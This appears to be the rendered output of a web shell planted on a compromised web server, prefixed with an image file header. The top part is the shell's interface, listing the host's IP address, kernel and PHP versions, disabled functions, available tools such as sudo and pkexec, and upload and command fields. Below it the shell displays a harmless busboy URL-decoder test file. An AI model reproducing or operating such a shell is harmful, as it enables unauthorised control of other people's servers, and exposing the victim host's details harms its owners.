????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.141.25.1
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/forge/node_modules/multer/node_modules/busboy/test/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/appsrv.astacus.se/forge/node_modules/multer/node_modules/busboy/test/test-utils-decoder.js
var Decoder = require('../lib/utils').Decoder;

var path = require('path'),
    assert = require('assert');

var group = path.basename(__filename, '.js') + '/';

[
  { source: ['Hello world'],
    expected: 'Hello world',
    what: 'No encoded bytes'
  },
  { source: ['Hello%20world'],
    expected: 'Hello world',
    what: 'One full encoded byte'
  },
  { source: ['Hello%20world%21'],
    expected: 'Hello world!',
    what: 'Two full encoded bytes'
  },
  { source: ['Hello%', '20world'],
    expected: 'Hello world',
    what: 'One full encoded byte split #1'
  },
  { source: ['Hello%2', '0world'],
    expected: 'Hello world',
    what: 'One full encoded byte split #2'
  },
  { source: ['Hello%20', 'world'],
    expected: 'Hello world',
    what: 'One full encoded byte (concat)'
  },
  { source: ['Hello%2Qworld'],
    expected: 'Hello%2Qworld',
    what: 'Malformed encoded byte #1'
  },
  { source: ['Hello%world'],
    expected: 'Hello%world',
    what: 'Malformed encoded byte #2'
  },
  { source: ['Hello+world'],
    expected: 'Hello world',
    what: 'Plus to space'
  },
  { source: ['Hello+world%21'],
    expected: 'Hello world!',
    what: 'Plus and encoded byte'
  },
  { source: ['5%2B5%3D10'],
    expected: '5+5=10',
    what: 'Encoded plus'
  },
  { source: ['5+%2B+5+%3D+10'],
    expected: '5 + 5 = 10',
    what: 'Spaces and encoded plus'
  },
].forEach(function(v) {
  var dec = new Decoder(), result = '';
  v.source.forEach(function(s) {
    result += dec.write(s);
  });
  var msg = '[' + group + v.what + ']: decoded string mismatch.\n'
            + 'Saw: ' + result + '\n'
            + 'Expected: ' + v.expected;
  assert.deepEqual(result, v.expected, msg);
});

Youez - 2016 - github.com/yon3zu
LinuXploit